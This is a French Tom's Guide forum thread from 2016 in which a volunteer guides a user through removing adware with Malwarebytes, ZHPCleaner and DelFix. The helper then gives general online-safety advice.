    PUP.Optional.FakeIELaunch, C:\Users\S\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk, En quarantaine, [26309ec5c0d958def05df926db2927d9],
    PUP.Optional.WinYahoo, C:\Users\S\AppData\LocalLow\Microsoft\Internet Explorer\Services\Wincy.ico, En quarantaine, [183eff64badf2c0a24dfdc45e91b7e82],
    PUP.Optional.CouponArific, C:\Program Files (x86)\35556262-902E-49AE-8622-66E14F1F041C\libeay32.dll, En quarantaine, [d77fb6ad3e5b92a465310ac4649ed62a],
    PUP.Optional.CouponArific, C:\Program Files (x86)\35556262-902E-49AE-8622-66E14F1F041C\nfapi.dll, En quarantaine, [d77fb6ad3e5b92a465310ac4649ed62a],
    PUP.Optional.CouponArific, C:\Program Files (x86)\35556262-902E-49AE-8622-66E14F1F041C\ProtocolFilters.dll, En quarantaine, [d77fb6ad3e5b92a465310ac4649ed62a],
    PUP.Optional.CouponArific, C:\Program Files (x86)\35556262-902E-49AE-8622-66E14F1F041C\ssleay32.dll, En quarantaine, [d77fb6ad3e5b92a465310ac4649ed62a],
    PUP.Optional.FastPlayer, C:\Users\S\AppData\Local\com\FastPlayer.exe_Url_ypw5ldaz5xtubzl3ykl5vaw3nmhswq1q\1.0.0.2\user.config, En quarantaine, [92c464ff4455b5811df7b721a0625ea2],
    PUP.Optional.DataMngr.AppFlsh, C:\Users\S\AppData\LocalLow\DataMngr\{2ad95a4b-54b3-4570-bc8b-e85db90c1775}64, En quarantaine, [9db9481bf4a5d85e0efd95604ab8e11f],

    Secteurs physiques: 0
    (Aucun élément malveillant détecté)


    (end)

    Merci pour ton aide, en attente de ta réponse

    m
    0
    l
    a c 940 8 Sécurité
    a c 103 È Firefox
    a b , Internet Explorer
    21 Février 2016 11:46:18

    Re,

    Parfait .... un dernier contrôle avec cet outil :

    --------------------------------------------------------------------------------------------------------------

    ZHPCleaner-Scanner :

    • Télécharge ZHPCleaner de Nicolas Coolman en cliquant sur le bouton bleu "Télécharger" et enregistre-le sur le Bureau
    • Ferme toutes les applications, y compris le navigateur
    • Double-clique sur l'icône ZHPCleaner.exe
      /!\ Sous Vista, Windows 7 et 8, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Accepte, après l'avoir lu, l'accord de licence en cliquant sur J'accepte
    • Clique sur le bouton Scanner

    • Poste le rapport obtenu ZHPCleaner.txt qui s'affiche.

      Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

      Tutoriel d'utilisation ZHPCleaner en images


  • --------------------------------------------------------------------------------------------------------------

    Est attendu le rapport ZHPCleaner-Scanner

    @+
    m
    0
    l
    a c 940 8 Sécurité
    a c 103 È Firefox
    a b , Internet Explorer
    21 Février 2016 12:32:44

    Re,

    --------------------------------------------------------------------------------------------------------------

    ZHPCleaner-Nettoyer :

    • Ferme toutes les applications, y compris le navigateur
    • Double-clique sur l'icône ZHPCleaner.exe
      /!\ Sous Vista, Windows 7 et 8, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Clique sur le bouton Scanner et patiente le temps de l'analyse, puis clique sur le bouton Nettoyer
    • L'interface de réparation s'affiche, clique sur Nettoyer. Le nettoyage se lance

    • Patiente le temps du nettoyage
    • Si un redémarrage est nécessaire pour compléter le nettoyage, clique sur OK et redémarre le système
    • Au redémarrage, le rapport de nettoyage ZHPCleaner.txt s'affiche. Poste le rapport obtenu.

      Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

      Tutoriel d'utilisation ZHPCleaner en images


  • --------------------------------------------------------------------------------------------------------------

    Est attendu le rapport ZHPCleaner-Nettoyer

    Comment se comporte le système maintenant ?


    @+
    m
    0
    l

    Meilleure solution

    a c 940 8 Sécurité
    a c 103 È Firefox
    a b , Internet Explorer
    21 Février 2016 12:58:36

    Re,

    C'est parfait, nous pouvons finaliser ;) 

    ---------------------------------------------------------------------------------------------

    Java :

    Télécharge et installe cette dernière version Java

    Pense à décocher le sponsor Yahoo qui est proposée


    Ensuite, dans le Panneau de configuration Java, dans l'onglet Avancé -> rubrique Divers -> coche la case Supprimer les offres de parrainage lors de l'installation ou la mise à jour de Java -> Appliquer


    ---------------------------------------------------------------------------------------------

    Adobe Reader :

    Télécharge et installe cette dernière version Adobe Reader
    N'oublie pas de décocher la case Google Chrome et McAfee Sécurity Scan


    ---------------------------------------------------------------------------------------------

    Quarantaine de Malwarebytes :

    • Lance Malwarebytes (clic droit exécuter en tant qu'administrateur)
    • Dans l'onglet Historique, sélectionne Quarantaine puis clique sur Supprimer tout


  • ---------------------------------------------------------------------------------------------

    DelFix :

    • Télécharge DelFix de Xplode et enregistre le fichier sur ton Bureau
    • Double-clique sur l'icône Delfix.exe pour lancer l'outil
      /!\ Sous Vista, Windows 7 et 8, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, coche uniquement les options
      - Supprimer les outils de désinfection
      - Purger la restauration système

    • Clique ensuite sur Exécuter et laisse l'outil travailler

    • Un rapport DelFix.txt s'ouvre. Poste ce rapport dans ta prochaine réponse
      Le rapport se trouve sous C:\DelFix.txt


  • ---------------------------------------------------------------------------------------------

    Quelques précisions et conseils :

    • D'une manière générale, il faut être prudent sur le net et ne pas cliquer sur tout ce qui paraît attrayant.

      /!\ Toujours privilégier le téléchargement d'une application sur le site de l'éditeur

      /!\ Bien lire les accords de licence avant toute installlation, des études ont montré que La France est championne du monde de malwares !

      /!\ Etre vigilant au moment de l'installation d'une application, Stop la pub !
      Installation d'une application sponsorisée, les pièges à éviter !

      /!\ Sauvegarder régulièrement les données personnelles sur un support externe

      /!\ Ne jamais ouvrir une pièce-jointe dans un mail d'un expéditeur inconnu



    • Maintenir son antivrus à jour et analyser le système régulièrement, avec en parallèle un scan avec Malwarebytes


    • Tenir son système à jour, au niveau des mises à jour Windows Update, sans oublier les logiciels installés.
      Vérifier aussi d'avoir toujours la dernière version de Java et Flash Player
      Il faut mettre à jour Flash Player sous chaque navigateur présent sur le système
      Penser à décocher les options proposées en même temps que Java et Flash Player (Barre Google, Scan McAfee ....)
      SX Check&Update - Vérifier et mettre à jour facilement les logiciels à risque ou son système


    • Au niveau de Firefox et Chrome, tu peux sécuriser ta navigation


      /!\ Une attitude responsable sur le net est la meilleure protection pour ton système
      Eviter les comportements à risques (cracks/keygens, P2P, streaming illégal, pornographie, etc.)



  • N'hésite pas si tu as des questions.

    Pour en savoir plus, clique sur l'image pour télécharger ce PDF

    -------------------------------------------------------------------------------------------

    Pour mieux comprendre comment tu as infecté ton système avec des adwares que tu as toi-même validés et pour éviter ce type de piège lors de l'installation d'une application gratuite, fais un test avec cet utilitaire qui va simuler une installation "pourrie" :


    • Télécharge Adware Prevention de guigui0001 sur ton bureau.
      Attention : en raison de la jeunesse du logiciel, ton navigateur ou ton antivirus peuvent le détecter à tort comme une menace ; ignore ces avertissements.
    • Lance-le en double-cliquant dessus (sous Windows 8, à l'activation de la protection SmartScreen, il faut cliquer sur Informations Complémentaires > Exécuter quand même)
    • Cet outil va simuler une installation bourrée d'adwares. Fais alors en sorte, tout au long de la pseudo-installation, de ne pas te faire piéger en étant vigilant.
    • A la fin de cette fausse installation, l'outil fait un bilan de tes décisions. Suis attentivement les conseils qu'il te donne.
    • Adopte alors la même vigilance lors de tes futures installations, qui seront réelles cette fois-ci !


  • Tutoriel en images

    Bon entraînement :) 

    -------------------------------------------------------------------------------------------

    Tu peux passer ce sujet en Résolu en cliquant sur le bouton Sélectionner comme meilleure solution (en bas d'une de mes réponses), ton sujet sera alors automatiquement marqué comme Résolu.

    @+
    partage
    21 Février 2016 14:14:41

    Merci pour ton aide c super bonne continuationa toi
    m
    0
    l
    a c 940 8 Sécurité
    a c 103 È Firefox
    a b , Internet Explorer
    21 Février 2016 17:12:12

    Bonne continuation .... et prudence sur le net :) 
    m
    0
    l
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS